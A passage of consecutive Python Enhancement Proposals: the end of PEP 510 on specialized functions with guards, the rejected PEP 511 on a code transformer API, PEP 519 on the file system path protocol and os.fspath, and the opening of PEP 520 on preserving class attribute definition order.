Raise an exception and return -1 on error
PyFunction_GetSpecializedCodes
Add a function method to get the list of specialized codes:
PyObject* PyFunction_GetSpecializedCodes(PyObject *func)
Return a list of (code, guards) tuples where code is a callable or
code object and guards is a list of PyFuncGuard objects. Raise an
exception and return NULL on error.
PyFunction_GetSpecializedCode
Add a function method checking guards to choose a specialized code:
PyObject* PyFunction_GetSpecializedCode(PyObject *func,
PyObject **stack,
int na, int nk)
See check() function of guards for stack, na and nk arguments.
Return a callable or a code object on success. Raise an exception and
return NULL on error.
PyFunction_RemoveSpecialized
Add a function method to remove a specialized code with its guards by
its index:
int PyFunction_RemoveSpecialized(PyObject *func, Py_ssize_t index)
Return 0 on success or if the index does not exist. Raise an exception and
return -1 on error.
PyFunction_RemoveAllSpecialized
Add a function method to remove all specialized codes and guards of a
function:
int PyFunction_RemoveAllSpecialized(PyObject *func)
Return 0 on success. Raise an exception and return -1 if func is not
a function.
Benchmark
Microbenchmark on python3.6 -m timeit -s 'def f(): pass' 'f()' (best
of 3 runs):
Original Python: 79 ns
Patched Python: 79 ns
According to this microbenchmark, the changes has no overhead on calling
a Python function without specialization.
Implementation
The issue #26098: PEP 510: Specialize functions with guards contains a patch which implements
this PEP.
Other implementations of Python
This PEP only contains changes to the Python C API, the Python API is
unchanged. Other implementations of Python are free to not implement new
additions, or implement added functions as no-op:
PyFunction_Specialize(): always return 1 (the specialization
has been ignored)
PyFunction_GetSpecializedCodes(): always return an empty list
PyFunction_GetSpecializedCode(): return the function code object,
as the existing PyFunction_GET_CODE() macro
Discussion
Thread on the python-ideas mailing list: RFC: PEP: Specialized
functions with guards.
Copyright
This document has been placed in the public domain.
| Rejected | PEP 510 – Specialize functions with guards | Standards Track | Add functions to the Python C API to specialize pure Python functions:
add specialized codes with guards. It allows to implement static
optimizers respecting the Python semantics. |
PEP 511 – API for code transformers
Author:
Victor Stinner <vstinner at python.org>
Status:
Rejected
Type:
Standards Track
Created:
04-Jan-2016
Python-Version:
3.6
Table of Contents
Rejection Notice
Abstract
Rationale
Usage 1: AST optimizer
Usage 2: Preprocessor
Usage 3: Disable all optimization
Usage 4: Write new bytecode optimizers in Python
Use Cases
Interactive interpreter
Build a transformed package
Install a package containing transformed .pyc files
Build .pyc files when installing a package
Execute transformed code
Code transformer API
code_transformer() method
ast_transformer() method
Changes
API to get/set code transformers
Optimizer tag
Peephole optimizer
AST enhancements
Examples
.pyc filenames
Bytecode transformer
AST transformer
Other Python implementations
Discussion
Prior Art
AST optimizers
Python Preprocessors
Bytecode transformers
Copyright
Rejection Notice
This PEP was rejected by its author.
This PEP was seen as blessing new Python-like programming languages
which are close but incompatible with the regular Python language. It
was decided to not promote syntaxes incompatible with Python.
This PEP was also seen as a nice tool to experiment new Python features,
but it is already possible to experiment them without the PEP, only with
importlib hooks. If a feature becomes useful, it should be directly part
of Python, instead of depending on an third party Python module.
Finally, this PEP was driven was the FAT Python optimization project
which was abandoned in 2016, since it was not possible to show any
significant speedup, but also because of the lack of time to implement
the most advanced and complex optimizations.
Abstract
Propose an API to register bytecode and AST transformers. Add also -o
OPTIM_TAG command line option to change .pyc filenames, -o
noopt disables the peephole optimizer. Raise an ImportError
exception on import if the .pyc file is missing and the code
transformers required to transform the code are missing. code
transformers are not needed code transformed ahead of time (loaded from
.pyc files).
Rationale
Python does not provide a standard way to transform the code. Projects
transforming the code use various hooks. The MacroPy project uses an
import hook: it adds its own module finder in sys.meta_path to
hook its AST transformer. Another option is to monkey-patch the
builtin compile() function. There are even more options to
hook a code transformer.
Python 3.4 added a compile_source() method to
importlib.abc.SourceLoader. But code transformation is wider than
just importing modules, see described use cases below.
Writing an optimizer or a preprocessor is out of the scope of this PEP.
Usage 1: AST optimizer
Transforming an Abstract Syntax Tree (AST) is a convenient
way to implement an optimizer. It’s easier to work on the AST than
working on the bytecode, AST contains more information and is more high
level.
Since the optimization can done ahead of time, complex but slow
optimizations can be implemented.
Example of optimizations which can be implemented with an AST optimizer:
Copy propagation:
replace x=1; y=x with x=1; y=1
Constant folding:
replace 1+1 with 2
Dead code elimination
Using guards (see PEP 510), it is possible to
implement a much wider choice of optimizations. Examples:
Simplify iterable: replace range(3) with (0, 1, 2) when used
as iterable
Loop unrolling
Call pure builtins: replace len("abc") with 3
Copy used builtin symbols to constants
See also optimizations implemented in fatoptimizer,
a static optimizer for Python 3.6.
The following issues can be implemented with an AST optimizer:
Issue #1346238: A constant folding
optimization pass for the AST
Issue #2181:
optimize out local variables at end of function
Issue #2499:
Fold unary + and not on constants
Issue #4264:
Patch: optimize code to use LIST_APPEND instead of calling list.append
Issue #7682:
Optimisation of if with constant expression
Issue #10399: AST
Optimization: inlining of function calls
Issue #11549:
Build-out an AST optimizer, moving some functionality out of the
peephole optimizer
Issue #17068:
peephole optimization for constant strings
Issue #17430:
missed peephole optimization
Usage 2: Preprocessor
A preprocessor can be easily implemented with an AST transformer. A
preprocessor has various and different usages.
Some examples:
Remove debug code like assertions and logs to make the code faster to
run it for production.
Tail-call Optimization
Add profiling code
Lazy evaluation:
see lazy_python
(bytecode transformer) and lazy macro of MacroPy (AST transformer)
Change dictionary literals into collection.OrderedDict instances
Declare constants: see @asconstants of codetransformer
Domain Specific Language (DSL) like SQL queries. The
Python language itself doesn’t need to be modified. Previous attempts
to implement DSL for SQL like PEP 335 - Overloadable Boolean
Operators was rejected.
Pattern Matching of functional languages
String Interpolation, but PEP 498
was merged into Python
3.6.
MacroPy has a long list of
examples and use cases.
This PEP does not add any new code transformer. Using a code transformer
will require an external module and to register it manually.
See also PyXfuscator: Python
obfuscator, deobfuscator, and user-assisted decompiler.
Usage 3: Disable all optimization
Ned Batchelder asked to add an option to disable the peephole optimizer
because it makes code coverage more difficult to implement. See the
discussion on the python-ideas mailing list: Disable all peephole
optimizations.
This PEP adds a new -o noopt command line option to disable the
peephole optimizer. In Python, it’s as easy as:
sys.set_code_transformers([])
It will fix the Issue #2506: Add
mechanism to disable optimizations.
Usage 4: Write new bytecode optimizers in Python
Python 3.6 optimizes the code using a peephole optimizer. By
definition, a peephole optimizer has a narrow view of the code and so
can only implement basic optimizations. The optimizer rewrites the
bytecode. It is difficult to enhance it, because it written in C.
With this PEP, it becomes possible to implement a new bytecode optimizer
in pure Python and experiment new optimizations.
Some optimizations are easier to implement on the AST like constant
folding, but optimizations on the bytecode are still useful. For
example, when the AST is compiled to bytecode, useless jumps can be
emitted because the compiler is naive and does not try to optimize
anything.
Use Cases
This section give examples of use cases explaining when and how code
transformers will be used.
Interactive interpreter
It will be possible to use code transformers with the interactive
interpreter which is popular in Python and commonly used to demonstrate
Python.
The code is transformed at runtime and so the interpreter can be slower
when expensive code transformers are used.
Build a transformed package
It will be possible to build a package of the transformed code.
A transformer can have a configuration. The configuration is not stored
in the package.
All .pyc files of the package must be transformed with the same code
transformers and the same transformers configuration.
It is possible to build different .pyc files using different
optimizer tags. Example: fat for the default configuration and
fat_inline for a different configuration with function inlining
enabled.
A package can contain .pyc files with different optimizer tags.
Install a package containing transformed .pyc files
It will be possible to install a package which contains transformed
.pyc files.
All .pyc files with any optimizer tag contained in the package are
installed, not only for the current optimizer tag.
Build .pyc files when installing a package
If a package does not contain any .pyc files of the current
optimizer tag (or some .pyc files are missing), the .pyc are
created during the installation.
Code transformers of the optimizer tag are required. Otherwise, the
installation fails with an error.
Execute transformed code
It will be possible to execute transformed code.
Raise an ImportError exception on import if the .pyc file of the
current optimizer tag is missing and the code transformers required to
transform the code are missing.
The interesting point here is that code transformers are not needed to
execute the transformed code if all required .pyc files are already
available.
Code transformer API
A code transformer is a class with ast_transformer() and/or
code_transformer() methods (API described below) and a name
attribute.
For efficiency, do not define a code_transformer() or
ast_transformer() method if it does nothing.
The name attribute (str) must be a short string used to identify
an optimizer. It is used to build a .pyc filename. The name must not
contain dots ('.'), dashes ('-') or directory separators: dots
are used to separated fields in a .pyc filename and dashes areused
to join code transformer names to build the optimizer tag.
Note
It would be nice to pass the fully qualified name of a module in the
context when an AST transformer is used to transform a module on
import, but it looks like the information is not available in
PyParser_ASTFromStringObject().
code_transformer() method
Prototype:
def code_transformer(self, code, context):
...
new_code = ...
...
return new_code
Parameters:
code: code object
context: an object with an optimize attribute (int), the optimization
level (0, 1 or 2). The value of the optimize attribute comes from the
optimize parameter of the compile() function, it is equal to
sys.flags.optimize by default.
Each implementation of Python can add extra attributes to context. For
example, on CPython, context will also have the following attribute:
interactive (bool): true if in interactive mode
XXX add more flags?
XXX replace flags int with a sub-namespace, or with specific attributes?
The method must return a code object.
The code transformer is run after the compilation to bytecode
ast_transformer() method
Prototype:
def ast_transformer(self, tree, context):
...
return tree
Parameters:
tree: an AST tree
context: an object with a filename attribute (str)
It must return an AST tree. It can modify the AST tree in place, or
create a new AST tree.
The AST transformer is called after the creation of the AST by the
parser and before the compilation to bytecode. New attributes may be
added to context in the future.
Changes
In short, add:
-o OPTIM_TAG command line option
sys.implementation.optim_tag
sys.get_code_transformers()
sys.set_code_transformers(transformers)
ast.PyCF_TRANSFORMED_AST
API to get/set code transformers
Add new functions to register code transformers:
sys.set_code_transformers(transformers): set the list of code
transformers and update sys.implementation.optim_tag
sys.get_code_transformers(): get the list of code
transformers.
The order of code transformers matter. Running transformer A and then
transformer B can give a different output than running transformer B an
then transformer A.
Example to prepend a new code transformer:
transformers = sys.get_code_transformers()
transformers.insert(0, new_cool_transformer)
sys.set_code_transformers(transformers)
All AST transformers are run sequentially (ex: the second transformer
gets the input of the first transformer), and then all bytecode
transformers are run sequentially.
Optimizer tag
Changes:
Add sys.implementation.optim_tag (str): optimization tag.
The default optimization tag is 'opt'.
Add a new -o OPTIM_TAG command line option to set
sys.implementation.optim_tag.
Changes on importlib:
importlib uses sys.implementation.optim_tag to build the
.pyc filename to importing modules, instead of always using
opt. Remove also the special case for the optimizer level 0
with the default optimizer tag 'opt' to simplify the code.
When loading a module, if the .pyc file is missing but the .py
is available, the .py is only used if code optimizers have the
same optimizer tag than the current tag, otherwise an ImportError
exception is raised.
Pseudo-code of a use_py() function to decide if a .py file can
be compiled to import a module:
def transformers_tag():
transformers = sys.get_code_transformers()
if not transformers:
return 'noopt'
return '-'.join(transformer.name
for transformer in transformers)
def use_py():
return (transformers_tag() == sys.implementation.optim_tag)
The order of sys.get_code_transformers() matter. For example, the
fat transformer followed by the pythran transformer gives the
optimizer tag fat-pythran.
The behaviour of the importlib module is unchanged with the default
optimizer tag ('opt').
Peephole optimizer
By default, sys.implementation.optim_tag is opt and
sys.get_code_transformers() returns a list of one code transformer:
the peephole optimizer (optimize the bytecode).
Use -o noopt to disable the peephole optimizer. In this case, the
optimizer tag is noopt and no code transformer is registered.
Using the -o opt option has not effect.
AST enhancements
Enhancements to simplify the implementation of AST transformers:
Add a new compiler flag PyCF_TRANSFORMED_AST to get the
transformed AST. PyCF_ONLY_AST returns the AST before the
transformers.
Examples
.pyc filenames
Example of .pyc filenames of the os module.
With the default optimizer tag 'opt':
.pyc filename
Optimization level
os.cpython-36.opt-0.pyc
0
os.cpython-36.opt-1.pyc
1
os.cpython-36.opt-2.pyc
2
With the 'fat' optimizer tag:
.pyc filename
Optimization level
os.cpython-36.fat-0.pyc
0
os.cpython-36.fat-1.pyc
1
os.cpython-36.fat-2.pyc
2
Bytecode transformer
Scary bytecode transformer replacing all strings with
"Ni! Ni! Ni!":
import sys
import types
class BytecodeTransformer:
name = "knights_who_say_ni"
def code_transformer(self, code, context):
consts = ['Ni! Ni! Ni!' if isinstance(const, str) else const
for const in code.co_consts]
return types.CodeType(code.co_argcount,
code.co_kwonlyargcount,
code.co_nlocals,
code.co_stacksize,
code.co_flags,
code.co_code,
tuple(consts),
code.co_names,
code.co_varnames,
code.co_filename,
code.co_name,
code.co_firstlineno,
code.co_lnotab,
code.co_freevars,
code.co_cellvars)
# replace existing code transformers with the new bytecode transformer
sys.set_code_transformers([BytecodeTransformer()])
# execute code which will be transformed by code_transformer()
exec("print('Hello World!')")
Output:
Ni! Ni! Ni!
AST transformer
Similarly to the bytecode transformer example, the AST transformer also
replaces all strings with "Ni! Ni! Ni!":
import ast
import sys
class KnightsWhoSayNi(ast.NodeTransformer):
def visit_Str(self, node):
node.s = 'Ni! Ni! Ni!'
return node
class ASTTransformer:
name = "knights_who_say_ni"
def __init__(self):
self.transformer = KnightsWhoSayNi()
def ast_transformer(self, tree, context):
self.transformer.visit(tree)
return tree
# replace existing code transformers with the new AST transformer
sys.set_code_transformers([ASTTransformer()])
# execute code which will be transformed by ast_transformer()
exec("print('Hello World!')")
Output:
Ni! Ni! Ni!
Other Python implementations
The PEP 511 should be implemented by all Python implementation, but the
bytecode and the AST are not standardized.
By the way, even between minor version of CPython, there are changes on
the AST API. There are differences, but only minor differences. It is
quite easy to write an AST transformer which works on Python 2.7 and
Python 3.5 for example.
Discussion
[Python-ideas] PEP 511: API for code transformers
(January 2016)
[Python-Dev] AST optimizer implemented in Python
(August 2012)
Prior Art
AST optimizers
The Issue #17515 “Add sys.setasthook() to allow to use a custom AST”
optimizer was a first attempt of
API for code transformers, but specific to AST.
In 2015, Victor Stinner wrote the fatoptimizer project, an AST optimizer
specializing functions using guards.
In 2014, Kevin Conway created the PyCC
optimizer.
In 2012, Victor Stinner wrote the astoptimizer project, an AST optimizer
implementing various optimizations. Most interesting optimizations break
the Python semantics since no guard is used to disable optimization if
something changes.
In 2011, Eugene Toder proposed to rewrite some peephole optimizations in
a new AST optimizer: issue #11549, Build-out an AST optimizer, moving
some functionality out of the peephole optimizer. The patch adds ast.Lit (it
was proposed to rename it to ast.Literal).
Python Preprocessors
MacroPy: MacroPy is an
implementation of Syntactic Macros in the Python Programming Language.
MacroPy provides a mechanism for user-defined functions (macros) to
perform transformations on the abstract syntax tree (AST) of a Python
program at import time.
pypreprocessor: C-style
preprocessor directives in Python, like #define and #ifdef
Bytecode transformers
codetransformer:
Bytecode transformers for CPython inspired by the ast module’s
NodeTransformer.
byteplay: Byteplay lets you
convert Python code objects into equivalent objects which are easy to
play with, and lets you convert those objects back into living Python
code objects. It’s useful for applying crazy transformations on Python
functions, and is also useful in learning Python byte code
intricacies. See byteplay documentation.
See also:
BytecodeAssembler
Copyright
This document has been placed in the public domain.
| Rejected | PEP 511 – API for code transformers | Standards Track | Propose an API to register bytecode and AST transformers. Add also -o
OPTIM_TAG command line option to change .pyc filenames, -o
noopt disables the peephole optimizer. Raise an ImportError
exception on import if the .pyc file is missing and the code
transformers required to transform the code are missing. code
transformers are not needed code transformed ahead of time (loaded from
.pyc files). |
PEP 519 – Adding a file system path protocol
Author:
Brett Cannon <brett at python.org>,
Koos Zevenhoven <k7hoven at gmail.com>
Status:
Final
Type:
Standards Track
Created:
11-May-2016
Python-Version:
3.6
Post-History:
11-May-2016,
12-May-2016,
13-May-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Proposal
Protocol
Standard library changes
builtins
os
os.path
pathlib
C API
Backwards compatibility
Implementation
Rejected Ideas
Other names for the protocol’s method
Separate str/bytes methods
Providing a path attribute
Have __fspath__() only return strings
A generic string encoding mechanism
Have __fspath__ be an attribute
Provide specific type hinting support
Provide os.fspathb()
Call __fspath__() off of the instance
Acknowledgements
References
Copyright
Abstract
This PEP proposes a protocol for classes which represent a file system
path to be able to provide a str or bytes representation.
Changes to Python’s standard library are also proposed to utilize this
protocol where appropriate to facilitate the use of path objects where
historically only str and/or bytes file system paths are
accepted. The goal is to facilitate the migration of users towards
rich path objects while providing an easy way to work with code
expecting str or bytes.
Rationale
Historically in Python, file system paths have been represented as
strings or bytes. This choice of representation has stemmed from C’s
own decision to represent file system paths as
const char * [3]. While that is a totally serviceable
format to use for file system paths, it’s not necessarily optimal. At
issue is the fact that while all file system paths can be represented
as strings or bytes, not all strings or bytes represent a file system
path. This can lead to issues where any e.g. string duck-types to a
file system path whether it actually represents a path or not.
To help elevate the representation of file system paths from their
representation as strings and bytes to a richer object representation,
the pathlib module [4] was provisionally introduced in
Python 3.4 through PEP 428. While considered by some as an improvement
over strings and bytes for file system paths, it has suffered from a
lack of adoption. Typically the key issue listed for the low adoption
rate has been the lack of support in the standard library. This lack
of support required users of pathlib to manually convert path objects
to strings by calling str(path) which many found error-prone.
One issue in converting path objects to strings comes from
the fact that the only generic way to get a string representation of
the path was to pass the object to str(). This can pose a
problem when done blindly as nearly all Python objects have some
string representation whether they are a path or not, e.g.
str(None) will give a result that
builtins.open() [5] will happily use to create a new
file.
Exacerbating this whole situation is the
DirEntry object [8]. While path objects have a
representation that can be extracted using str(), DirEntry
objects expose a path attribute instead. Having no common
interface between path objects, DirEntry, and any other
third-party path library has become an issue. A solution that allows
any path-representing object to declare that it is a path and a way
to extract a low-level representation that all path objects could
support is desired.
This PEP then proposes to introduce a new protocol to be followed by
objects which represent file system paths. Providing a protocol allows
for explicit signaling of what objects represent file system paths as
well as a way to extract a lower-level representation that can be used
with older APIs which only support strings or bytes.
Discussions regarding path objects that led to this PEP can be found
in multiple threads on the python-ideas mailing list archive
[1] for the months of March and April 2016 and on
the python-dev mailing list archives [2] during
April 2016.
Proposal
This proposal is split into two parts. One part is the proposal of a
protocol for objects to declare and provide support for exposing a
file system path representation. The other part deals with changes to
Python’s standard library to support the new protocol. These changes
will also lead to the pathlib module dropping its provisional status.
Protocol
The following abstract base class defines the protocol for an object
to be considered a path object:
import abc
import typing as t
class PathLike(abc.ABC):
"""Abstract base class for implementing the file system path protocol."""
@abc.abstractmethod
def __fspath__(self) -> t.Union[str, bytes]:
"""Return the file system path representation of the object."""
raise NotImplementedError
Objects representing file system paths will implement the
__fspath__() method which will return the str or bytes
representation of the path. The str representation is the
preferred low-level path representation as it is human-readable and
what people historically represent paths as.
Standard library changes
It is expected that most APIs in Python’s standard library that
currently accept a file system path will be updated appropriately to
accept path objects (whether that requires code or simply an update
to documentation will vary). The modules mentioned below, though,
deserve specific details as they have either fundamental changes that
empower the ability to use path objects, or entail additions/removal
of APIs.
builtins
open() [5] will be updated to accept path objects as
well as continue to accept str and bytes.
os
The fspath() function will be added with the following semantics:
import typing as t
def fspath(path: t.Union[PathLike, str, bytes]) -> t.Union[str, bytes]:
"""Return the string representation of the path.
If str or bytes is passed in, it is returned unchanged. If __fspath__()
returns something other than str or bytes then TypeError is raised. If
this function is given something that is not str, bytes, or os.PathLike
then TypeError is raised.
"""
if isinstance(path, (str, bytes)):
return path
# Work from the object's type to match method resolution of other magic
# methods.
path_type = type(path)
try:
path = path_type.__fspath__(path)
except AttributeError:
if hasattr(path_type, '__fspath__'):
raise
else:
if isinstance(path, (str, bytes)):
return path
else:
raise TypeError("expected __fspath__() to return str or bytes, "
"not " + type(path).__name__)
raise TypeError("expected str, bytes or os.PathLike object, not "
+ path_type.__name__)
The os.fsencode() [6] and
os.fsdecode() [7] functions will be updated to accept
path objects. As both functions coerce their arguments to
bytes and str, respectively, they will be updated to call
__fspath__() if present to convert the path object to a str or
bytes representation, and then perform their appropriate
coercion operations as if the return value from __fspath__() had
been the original argument to the coercion function in question.
The addition of os.fspath(), the updates to
os.fsencode()/os.fsdecode(), and the current semantics of
pathlib.PurePath provide the semantics necessary to
get the path representation one prefers. For a path object,
pathlib.PurePath/Path can be used. To obtain the str or
bytes representation without any coercion, then os.fspath()
can be used. If a str is desired and the encoding of bytes
should be assumed to be the default file system encoding, then
os.fsdecode() should be used. If a bytes representation is
desired and any strings should be encoded using the default file
system encoding, then os.fsencode() is used. This PEP recommends
using path objects when possible and falling back to string paths as
necessary and using bytes as a last resort.
Another way to view this is as a hierarchy of file system path
representations (highest- to lowest-level): path → str → bytes. The
functions and classes under discussion can all accept objects on the
same level of the hierarchy, but they vary in whether they promote or
demote objects to another level. The pathlib.PurePath class can
promote a str to a path object. The os.fspath() function can
demote a path object to a str or bytes instance, depending
on what __fspath__() returns.
The os.fsdecode() function will demote a path object to
a string or promote a bytes object to a str. The
os.fsencode() function will demote a path or string object to
bytes. There is no function that provides a way to demote a path
object directly to bytes while bypassing string demotion.
The DirEntry object [8] will gain an __fspath__()
method. It will return the same value as currently found on the
path attribute of DirEntry instances.
The Protocol ABC will be added to the os module under the name
os.PathLike.
os.path
The various path-manipulation functions of os.path [9]
will be updated to accept path objects. For polymorphic functions that
accept both bytes and strings, they will be updated to simply use
os.fspath().
During the discussions leading up to this PEP it was suggested that
os.path not be updated using an “explicit is better than implicit”
argument. The thinking was that since __fspath__() is polymorphic
itself it may be better to have code working with os.path extract
the path representation from path objects explicitly. There is also
the consideration that adding support this deep into the low-level OS
APIs will lead to code magically supporting path objects without
requiring any documentation updated, leading to potential complaints
when it doesn’t work, unbeknownst to the project author.
But it is the view of this PEP that “practicality beats purity” in
this instance. To help facilitate the transition to supporting path
objects, it is better to make the transition as easy as possible than
to worry about unexpected/undocumented duck typing support for
path objects by projects.
There has also been the suggestion that os.path functions could be
used in a tight loop and the overhead of checking or calling
__fspath__() would be too costly. In this scenario only
path-consuming APIs would be directly updated and path-manipulating
APIs like the ones in os.path would go unmodified. This would
require library authors to update their code to support path objects
if they performed any path manipulations, but if the library code
passed the path straight through then the library wouldn’t need to be
updated. It is the view of this PEP and Guido, though, that this is an
unnecessary worry and that performance will still be acceptable.
pathlib
The constructor for pathlib.PurePath and pathlib.Path will be
updated to accept PathLike objects. Both PurePath and Path
will continue to not accept bytes path representations, and so if
__fspath__() returns bytes it will raise an exception.
The path attribute will be removed as this PEP makes it
redundant (it has not been included in any released version of Python
and so is not a backwards-compatibility concern).
C API
The C API will gain an equivalent function to os.fspath():
/*
Return the file system path representation of the object.
If the object is str or bytes, then allow it to pass through with
an incremented refcount. If the object defines __fspath__(), then
return the result of that method. All other types raise a TypeError.
*/
PyObject *
PyOS_FSPath(PyObject *path)
{
_Py_IDENTIFIER(__fspath__);
PyObject *func = NULL;
PyObject *path_repr = NULL;
if (PyUnicode_Check(path) || PyBytes_Check(path)) {
Py_INCREF(path);
return path;
}
func = _PyObject_LookupSpecial(path, &PyId___fspath__);
if (NULL == func) {
return PyErr_Format(PyExc_TypeError,
"expected str, bytes or os.PathLike object, "
"not %S",
path->ob_type);
}
path_repr = PyObject_CallFunctionObjArgs(func, NULL);
Py_DECREF(func);
if (!PyUnicode_Check(path_repr) && !PyBytes_Check(path_repr)) {
Py_DECREF(path_repr);
return PyErr_Format(PyExc_TypeError,
"expected __fspath__() to return str or bytes, "
"not %S",
path_repr->ob_type);
}
return path_repr;
}
Backwards compatibility
There are no explicit backwards-compatibility concerns. Unless an
object incidentally already defines a __fspath__() method there is
no reason to expect the pre-existing code to break or expect to have
its semantics implicitly changed.
Libraries wishing to support path objects and a version of Python
prior to Python 3.6 and the existence of os.fspath() can use the
idiom of
path.__fspath__() if hasattr(path, "__fspath__") else path.
Implementation
This is the task list for what this PEP proposes to be changed in
Python 3.6:
Remove the path attribute from pathlib
(done)
Remove the provisional status of pathlib
(done)
Add os.PathLike
(code and
docs done)
Add PyOS_FSPath()
(code and
docs done)
Add os.fspath()
(done <done)
Update os.fsencode()
(done)
Update os.fsdecode()
(done)
Update pathlib.PurePath and pathlib.Path
(done)
Add __fspath__()
Add os.PathLike support to the constructors
Add __fspath__() to DirEntry
(done)
Update builtins.open()
(done)
Update os.path
(done)
Add a glossary entry for “path-like”
(done)
Update “What’s New”
(done)
Rejected Ideas
Other names for the protocol’s method
Various names were proposed during discussions leading to this PEP,
including __path__, __pathname__, and __fspathname__. In
the end people seemed to gravitate towards __fspath__ for being
unambiguous without being unnecessarily long.
Separate str/bytes methods
At one point it was suggested that __fspath__() only return
strings and another method named __fspathb__() be introduced to
return bytes. The thinking is that by making __fspath__() not be
polymorphic it could make dealing with the potential string or bytes
representations easier. But the general consensus was that returning
bytes will more than likely be rare and that the various functions in
the os module are the better abstraction to promote over direct
calls to __fspath__().
Providing a path attribute
To help deal with the issue of pathlib.PurePath not inheriting
from str, originally it was proposed to introduce a path
attribute to mirror what os.DirEntry provides. In the end,
though, it was determined that a protocol would provide the same
result while not directly exposing an API that most people will never
need to interact with directly.
Have __fspath__() only return strings
Much of the discussion that led to this PEP revolved around whether
__fspath__() should be polymorphic and return bytes as well as
str or only return str. The general sentiment for this view
was that bytes are difficult to work with due to their
inherent lack of information about their encoding and PEP 383 makes
it possible to represent all file system paths using str with the
surrogateescape handler. Thus, it would be better to forcibly
promote the use of str as the low-level path representation for
high-level path objects.
In the end, it was decided that using bytes to represent paths is
simply not going to go away and thus they should be supported to some
degree. The hope is that people will gravitate towards path objects
like pathlib and that will move people away from operating directly
with bytes.
A generic string encoding mechanism
At one point there was a discussion of developing a generic mechanism
to extract a string representation of an object that had semantic
meaning (__str__() does not necessarily return anything of
semantic significance beyond what may be helpful for debugging). In
the end, it was deemed to lack a motivating need beyond the one this
PEP is trying to solve in a specific fashion.
Have __fspath__ be an attribute
It was briefly considered to have __fspath__ be an attribute
instead of a method. This was rejected for two reasons. One,
historically protocols have been implemented as “magic methods” and
not “magic methods and attributes”. Two, there is no guarantee that
the lower-level representation of a path object will be pre-computed,
potentially misleading users that there was no expensive computation
behind the scenes in case the attribute was implemented as a property.
This also indirectly ties into the idea of introducing a path
attribute to accomplish the same thing. This idea has an added issue,
though, of accidentally having any object with a path attribute
meet the protocol’s duck typing. Introducing a new magic method for
the protocol helpfully avoids any accidental opting into the protocol.
Provide specific type hinting support
There was some consideration to providing a generic typing.PathLike
class which would allow for e.g. typing.PathLike[str] to specify
a type hint for a path object which returned a string representation.
While potentially beneficial, the usefulness was deemed too small to
bother adding the type hint class.
This also removed any desire to have a class in the typing module
which represented the union of all acceptable path-representing types
as that can be represented with
typing.Union[str, bytes, os.PathLike] easily enough and the hope
is users will slowly gravitate to path objects only.
Provide os.fspathb()
It was suggested that to mirror the structure of e.g.
os.getcwd()/os.getcwdb(), that os.fspath() only return
str and that another function named os.fspathb() be
introduced that only returned bytes. This was rejected as the
purposes of the *b() functions are tied to querying the file
system where there is a need to get the raw bytes back. As this PEP
does not work directly with data on a file system (but which may
be), the view was taken this distinction is unnecessary. It’s also
believed that the need for only bytes will not be common enough to
need to support in such a specific manner as os.fsencode() will
provide similar functionality.
Call __fspath__() off of the instance
An earlier draft of this PEP had os.fspath() calling
path.__fspath__() instead of type(path).__fspath__(path). The
changed to be consistent with how other magic methods in Python are
resolved.
Acknowledgements
Thanks to everyone who participated in the various discussions related
to this PEP that spanned both python-ideas and python-dev. Special
thanks to Stephen Turnbull for direct feedback on early drafts of this
PEP. More special thanks to Koos Zevenhoven and Ethan Furman for not
only feedback on early drafts of this PEP but also helping to drive
the overall discussion on this topic across the two mailing lists.
References
[1]
The python-ideas mailing list archive
(https://mail.python.org/pipermail/python-ideas/)
[2]
The python-dev mailing list archive
(https://mail.python.org/pipermail/python-dev/)
[3]
open() documentation for the C standard library
(http://www.gnu.org/software/libc/manual/html_node/Opening-and-Closing-Files.html)
[4]
The pathlib module
(https://docs.python.org/3/library/pathlib.html#module-pathlib)
[5] (1, 2)
The builtins.open() function
(https://docs.python.org/3/library/functions.html#open)
[6]
The os.fsencode() function
(https://docs.python.org/3/library/os.html#os.fsencode)
[7]
The os.fsdecode() function
(https://docs.python.org/3/library/os.html#os.fsdecode)
[8] (1, 2)
The os.DirEntry class
(https://docs.python.org/3/library/os.html#os.DirEntry)
[9]
The os.path module
(https://docs.python.org/3/library/os.path.html#module-os.path)
Copyright
This document has been placed in the public domain.
| Final | PEP 519 – Adding a file system path protocol | Standards Track | This PEP proposes a protocol for classes which represent a file system
path to be able to provide a str or bytes representation.
Changes to Python’s standard library are also proposed to utilize this
protocol where appropriate to facilitate the use of path objects where
historically only str and/or bytes file system paths are
accepted. The goal is to facilitate the migration of users towards
rich path objects while providing an easy way to work with code
expecting str or bytes. |
PEP 520 – Preserving Class Attribute Definition Order
Author:
Eric Snow <ericsnowcurrently at gmail.com>
Status:
Final
Type:
Standards Track
Created:
07-Jun-2016
Python-Version:
3.6
Post-History:
07-Jun-2016, 11-Jun-2016, 20-Jun-2016, 24-Jun-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Motivation
Background
Specification
Why a tuple?
Why not a read-only attribute?
Why not “__attribute_order__”?
Why not ignore “dunder” names?
Why None instead of an empty tuple?
Why None instead of not setting the attribute?
Why constrain manually set values?
Why not hide __definition_order__ on non-type objects?
What about __slots__?
Why is __definition_order__ even necessary?
Support for C-API Types
Compatibility
Changes
Other Python Implementations
Implementation
Alternatives
An Order-preserving cls.__dict__
A “namespace” Keyword Arg for Class Definition
A stdlib Metaclass that Implements __prepare__() with OrderedDict
Set __definition_order__ at Compile-time
References
Copyright
Note
Since compact dict has landed in 3.6, __definition_order__
has been removed. cls.__dict__ now mostly accomplishes the same
thing instead.
Abstract
The class definition syntax is ordered by its very nature. Class
attributes defined there are thus ordered. Aside from helping with
readability, that ordering is sometimes significant. If it were
automatically available outside the class definition then the
attribute order could be used without the need for extra boilerplate
(such as metaclasses or manually enumerating the attribute order).
Given that this information already exists, access to the definition
order of attributes is a reasonable expectation. However, currently
Python does not preserve the attribute order from the class
definition.
This PEP changes that by preserving the order in which attributes
are introduced in the class definition body. That order will now be
preserved in the __definition_order__ attribute of the class.
This allows introspection of the original definition order, e.g. by
class decorators.
Additionally, this PEP requires that the default class definition
namespace be ordered (e.g. OrderedDict) by default. The
long-lived class namespace (__dict__) will remain a dict.
Motivation
The attribute order from a class definition may be useful to tools
that rely on name order. However, without the automatic availability
of the definition order, those tools must impose extra requirements on
users. For example, use of such a tool may require that your class use
a particular metaclass. Such requirements are often enough to
discourage use of the tool.
Some tools that could make use of this PEP include:
documentation generators
testing frameworks
CLI frameworks
web frameworks
config generators
data serializers
enum factories (my original motivation)
Background
When a class is defined using a class statement, the class body
is executed within a namespace. Currently that namespace defaults to
dict. If the metaclass defines __prepare__() then the result
